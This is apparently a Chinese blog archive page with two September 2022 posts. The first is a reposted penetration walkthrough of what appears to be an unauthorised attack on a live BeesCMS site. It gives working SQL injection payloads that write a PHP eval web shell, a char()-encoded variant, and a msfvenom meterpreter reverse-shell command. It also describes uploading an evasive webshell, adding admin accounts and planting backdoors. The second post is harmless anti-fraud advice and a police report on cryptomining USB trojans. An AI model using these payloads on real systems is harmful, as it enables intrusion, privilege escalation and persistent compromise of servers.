网站首页 发表在 2022年09月 的所有文章

  • 实战 | 记一次网站渗透过程

    一、序言 前几天记录某一次无意点开的一个小网站的渗透过程,幸运的是搭建平台是phpstudy,cms是beecms,beecms有通用漏洞,然后去网上找了资料,成功getshell并获取服务器权限。 二、渗透过程 1. 无意点开一个网站,发现网站比较小,且看起来比较老,然后发现logo没有改,于是乎去百度搜索这个cms,发现有通用漏洞 Beecms 通用漏洞 https://www.ohinge.cn/php/beescms_sqli.html 2. 这里运气比较好,没有更改后台地址,还是默认地址/admin/login.php 3. 通过通用漏洞发先后台管理处存在sql注入漏洞,直接输入admin’,然后就会报错,这里用万能密码不能登陆,看来还是得通过上面得通用漏洞来进行注入 4. 可以看到输入payload后,页面返回正常,从而可以判断有sql注入,这里采用双写进行绕过 5. 发现这个注入点后,就有各种各样的注入方式了,通过sql语句写入一句话,sqlmap一把梭,手工注入得到账号密码等等,怎么方便怎么来,这里我把几种方法都写一下,看看那种方法可以 方法一 1.通过post抓包sqlmap一把梭,dump出管理员账号密码,进后台找上传点 2.一把梭,发现并没有,使用脚本也没有绕过 方法二 1.通过burp抓包,写入一句话,payload: admin%27 un union ion selselectect 1,2,3,4,<?php @eval($_POST[123]);?> into outfile 'xm.php'# 发现写入失败,前面讲到有防护,这里通过hex编码或者char函数绕过 2.对shell部分进行编码 3.写入shell的payload为:注意:记得在编码转换的时候前面加0x或者直接用unhex函数,但是本次实验用unhex函数一直失败,所以在前面加0x,看到可以写入成功。 ps:这里的写入路径纯属盲猜,运气好,默认目录 4.用蚁剑连接,成功连接,至此getshell完毕,下来就是后渗透阶段,后面会讲 char函数绕过:mysql内置函数char()可以将里面的ascii码转换为字符串,payload为: admin' uni union on selselectect null,null,null,null,char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62) in into outoutfilefile 'C:/phpStudy/WWW/beescms/cmd.php'# 一样成功写入 1.写入成功后,菜刀可以连接,我们访问写入的文件,惊奇的发现竟然有admin,和一串md5码,大胆猜测可能是后台账号和密码,试一下 2.md5解密,wocao,成功登陆,然后就是后台找上传了 三、后渗透 通过whoami查看权限,发现是admin权限,但是不是最高权限,我们要提到最高权限去 方法一 1.通过msf生成木马提权,payload: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe X > shell.exe 2.通过蚁剑上传木马,并执行。执行之前打开msf使用模块 use exploit/multi/handler 设置相应参数,然后开始监听 2.不知道什么问题,用这个没有成功,那么只能通过大马提权了 方法二 1.上传大马,此处应该有狗或者盾之类的,用的免杀,成功上传 2.访问大马 3.这里提权方式很多,就不细说了,有大马之后很多操作都可以引刃而解了,开放端口,添加账号,留后门。。等等 4.创建admin权限账号之后,登陆服务器 四、一些其他的发现 通过扫描目录,还发现有phpmyadmin,可以爆破,这里我试了下竟然是弱口令,都是root,但是连接不上,只能通过phpmyadmin登陆,发现是低版本的phpstudy搭建的,这里就可以另一种思路,利用日志文件写入一句话getshell 五、总结 1.前台sql注入获取用户名密码,进入后台找上传 2.SQL注入语句写入一句话 3.phpmyadmin一句话getshell 4.上传大马提权 至此,渗透结束 文章转载于:https://blog.csdn.net/qq_42111373 ...

    2022-09-15 400
  • 檀健次《你安全吗》,抵制网络犯罪,“网安”模式正式开启;为啥网吧电脑集体变慢? 竟因木马在“挖矿”!

    檀健次《你安全吗》,抵制网络犯罪, “网安”模式正式开启; 网络剧《你安全吗》正在热播,该剧主要讲述了游走于网络世界的“三剑客”秦淮(檀健次 饰)、周游(荣梓杉 饰)和陈默(赫雷 饰),虽性格迥异,但都秉持“科技向善”的初心,恪守正义底线,协助公安部门在打击犯罪的过程中,不断收获成长的故事。然而正义之路总是不会一帆风顺,从意气风发到锒铛入狱、被迫客走他乡,陈默面对强大的黑产势力又会有怎么样的反击呢?抵制网络犯罪,“网安”模式正式开启! 聚焦网络安全,前四集中就涉及到很多有关个人信息泄露的问题,我们一起跟着檀健次学习一下哪些行为可能造成信息泄露,又应该如何保护隐私吧。 一:不要随意使用充电宝 在手机不离身的新时代,手机没电应该是最让人恐慌的事了,充电宝就是安全感的保证,可你知道吗,只是借用一个充电宝,就可能造成手机里个人数据、照片视频等信息全部泄露。 檀健次饰演的秦淮就曾帮警方破获了这样一起案件,看似和普通充电宝无异,其实被不法分子藏着超小型计算机,只要和手机链接,就可以窃取所有信息,进而利用你的信息进行诈骗,甚至违法犯罪。 所以,切记:不要使用陌生人的充电宝,不要在非正规场所购买远低于市场价的充电宝,充电时手机不要离开视线范围。 二:朋友圈不要设置陌生人可见十条朋友圈早已成为大多数人分享生活的重要工具,美食、聚会、旅游、甚至是机票车票,都会发到朋友圈,却不曾想这一行为早已将隐私暴露得一览无遗。剧中秦淮就是通过附近的人搜索到用户,并通过陌生人可见的十条朋友圈就将其性格和生活推测得八九不离十。 所以,切记:关闭陌生人可查看十条朋友圈的功能,关闭附近的人功能,分享动态时记得遮挡个人隐私信息,包括身份证号码、手机号码、车票机票等。 三:不要随意点击陌生链接在互联网时代,网络链接已经太常见,然而,有的链接一点进去,轻则信息泄露,重则账户被洗劫一空。剧中秦淮为了探知对方身份,就伪制了一个游戏链接发给对方,只要一点开就会暴露位置。所以,切记:来历不明的链接千万不要点击。 四:快递、外卖单不要随意丢弃 网购、点外卖早已成为年轻人的生活常态,可你也许没注意,随意丢弃的快递盒和外卖轻易就会暴露你的信息,姓名、电话、详细住址都在其中。 剧中周游为了探查秦淮的身份,就是通过翻找秦淮丢掉的垃圾,并在外卖单上发现了个人信息。 所以,切记:快递和外卖单不要直接丢掉,上面的个人信息一定要抹掉。 五:不要随便扫二维码 大家应该都遇到过让帮忙扫二维码赠送小礼品的人吧,有的也许是心软不好拒绝,有的也许是想要那个小礼品,可往往贪小便宜会吃大亏,不仅二维码本身就藏着未知风险,所谓的礼品可能也是暗藏玄机。比如剧中秦淮公司的丁阿姨就十分喜欢这种小礼品,却不曾想其中一个礼品中被藏了WIFI探针。所以,切记:天下没有免费的午餐,不要随便扫描陌生二维码。 六:不要连陌生WIFI 手机没有网络就和砸核桃的板砖一样,所以无论走到哪里最先问的应该就是WIFI密码多少,可你也许不知道,WIFI也暗藏风险。比如丁阿姨的小礼品中的WIFI探针就有这个作用,它会记录下所有连过它WIFI的手机的个人信息,周游也就是通过它追踪到了秦淮的定位。所以,切记:出门在外不要随意连陌生WIFI。总之,信息泄露无处不在,需随时提高警惕。继续关注《你安全吗》,学习更多网络安全知识吧。 为啥网吧电脑集体变慢?  竟因木马在“挖矿”! 我是XX在线网吧老板 我家网吧 交通方便,装修豪华 电脑配置优越 给每位顾客飞一般的网速 家一般的呵护 可不知怎的 我家网吧最近总接到顾客投诉 团战必卡、屡送“人头” 害得顾客被骂是“猪”队友 明明是顶配电脑 重启、重装全无疗效 不如报警吧 我们一起把谜底揭晓    按照夏季治安打击整治“百日行动”工作部署,近日,盐城网安成功捣毁一个以张某堂为首的利用黑客技术实施非法控制计算机信息系统的黑客团伙,查扣定制木马U盘475个,黑客程序源代码1套。 疑点:网吧电脑集体中毒    今年7月,江苏盐城一网吧老板报警称:网吧电脑十分异常,疑似被植入了病毒——电脑运行速度变得奇慢无比,别说是运行网络游戏,就连正常的上网搜索都非常卡。 更为离奇的是,电脑只要一开机,哪怕不运行任何程序,电脑系统资源的占有率就已经达到70%以上。后经自检发现,网吧内电脑主机上均被插上了不明来源的U盘。 出手:网警细查发现“病因”   盐城网安部门接到报警后,立即展开调查。 民警发现这些可疑U盘插入主机后,电脑会其默认识别为键盘,具有极高的隐蔽性和伪装性,一般用户很难察觉。 随后,U盘内程序便开始自动隐蔽运行挖矿程序。   网警小课堂:挖矿是什么? 网上的“挖矿”,指的是“矿工”根据设计者提供的开源软件,提供一定的计算机运算力,通过复杂的数学运算,求得方程式特解的过程,求得特解的“矿工”可以得到特定数量的比特币等虚拟货币奖励。 而所需的“铲子”就是配置较高,运算速度足够快的计算机,“矿工”也就是操纵电脑的使用者。 亮剑:警方出击揪出“黑手” 深入调查后警方查明:自2022年6月起,淮安籍犯罪嫌疑人张某堂、刘某波、戴某新便开始商讨如何利用网吧高配电脑挖矿赚钱,后通过境外通联工具勾连河北籍黑客魏某、曹某,以38800元的价值定制了475个木马U盘。 该U盘仅指甲盖大小,可伪装成键盘、鼠标等外设,并自动静默各类定制程序,运行具有很高的隐蔽性。为便于通过后台及时掌握矿池挖矿情况,主犯张某堂还特别要求曹某在编写了程序时为每个U盘进行编号。     收到U盘后,张某堂等三人分别驾车赴扬州、盐城、淮安等地寻找电竞酒店、连锁网吧35家,偷装U盘188个实施非法控制电脑进行挖矿。 短短半个多月的时间,三人便非法牟利4万余元。在张某堂看来,借鸡生蛋的大买卖才刚刚开始,殊不知一幅天罗地网已在其身后徐徐展开。      在充分掌握该黑客团伙犯罪事实后,盐城网安部门立即开展集中收网行动,成功抓获5名犯罪嫌疑人。 目前该5人均因涉嫌非法控制计算机信息系统罪被刑事拘留。 文章来源 :网易号:院角小蘑菇、公安部网安局 ...

    2022-09-15 370

联系我们

在线咨询:点击这里给我发消息

QQ交流群:KirinBlog

工作日:8:00-23:00,节假日休息

扫码关注